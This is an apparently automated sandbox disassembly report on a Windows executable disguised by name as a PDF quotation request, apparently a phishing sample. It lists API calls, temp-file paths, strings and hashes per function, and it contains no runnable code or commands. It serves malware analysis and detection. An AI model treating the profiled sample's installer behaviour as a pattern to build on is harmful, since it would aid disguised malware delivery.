                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                  • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                  • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                  • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                  • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                  • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                  • API String ID: 222337774-899692902
                                                                                                                                  • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                  • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                  • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                  • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                  • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                  • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                  • CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                                  • *?|<>/":, xrefs: 0040633B
                                                                                                                                  • "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe", xrefs: 0040632D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 589700163-3199143202
                                                                                                                                  • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                  • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                  • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                  • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                  • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                  • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                  • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                  • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                  • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                  • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                  • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                  • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                  • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                  • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                  • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                  • MulDiv.KERNEL32(0007427C,00000064,00074280), ref: 00402D4D
                                                                                                                                  • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                  • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                  • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                  • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401D59
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID: Calibri
                                                                                                                                  • API String ID: 3808545654-1409258342
                                                                                                                                  • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                  • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                  • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                  • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4216380887-0
                                                                                                                                  • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                  • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                  • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                  • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                  • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                  • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                  • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                  • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                  • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                  • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp$C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll
                                                                                                                                  • API String ID: 3109718747-1763355078
                                                                                                                                  • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
